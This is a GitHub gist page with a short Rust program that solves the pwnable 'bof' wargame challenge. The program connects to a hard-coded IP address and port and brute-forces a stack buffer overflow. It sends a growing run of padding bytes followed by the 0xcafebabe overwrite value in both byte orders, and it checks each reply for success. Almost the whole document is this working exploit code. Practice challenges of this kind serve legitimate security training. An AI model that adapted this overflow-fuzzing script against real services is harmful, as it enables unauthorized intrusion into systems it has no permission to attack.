Skip to content

Instantly share code, notes, and snippets.

@Lucretiel
Created May 13, 2020 20:23
Show Gist options
  • Save Lucretiel/3825dcd658c29e4dbb206d299e5f6e00 to your computer and use it in GitHub Desktop.
Save Lucretiel/3825dcd658c29e4dbb206d299e5f6e00 to your computer and use it in GitHub Desktop.
Program for solving pwnable bof
use std::io::{self, BufReader, BufWriter, Read};
use std::net;
#[derive(Debug, Copy, Clone)]
struct SlamParams<'a> {
prefix_length: usize,
payload: &'a [u8],
}
fn deliver_payload(mut dest: impl io::Write, params: SlamParams) -> io::Result<()> {
for _ in 0..params.prefix_length {
dest.write_all(&[b'a'])?;
}
dest.write_all(params.payload)?;
dest.flush()?;
Ok(())
}
fn stack_slam(dest: net::SocketAddr, params: SlamParams) -> io::Result<String> {
let connection = net::TcpStream::connect(dest)?;
let writer = BufWriter::new(&connection);
deliver_payload(writer, params)?;
connection.shutdown(net::Shutdown::Write)?;
let mut reader = BufReader::new(&connection);
let mut result = String::new();
reader.read_to_string(&mut result)?;
Ok(result)
}
fn main() {
let payloads = [&[0xca, 0xfe, 0xba, 0xbe][..], &[0xbe, 0xba, 0xfe, 0xca][..]];
let addr = ([128, 61, 240, 205], 9000).into();
for prefix_length in 0..100 {
for &payload in &payloads {
let params = SlamParams {
prefix_length,
payload,
};
println!("Attempting {:?}", params);
match stack_slam(addr, params) {
Ok(result) if !result.contains("Nah..") => {
println!("Success!");
return;
}
Err(err) => {
println!("Error with : {}", err);
return;
}
_ => {}
}
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment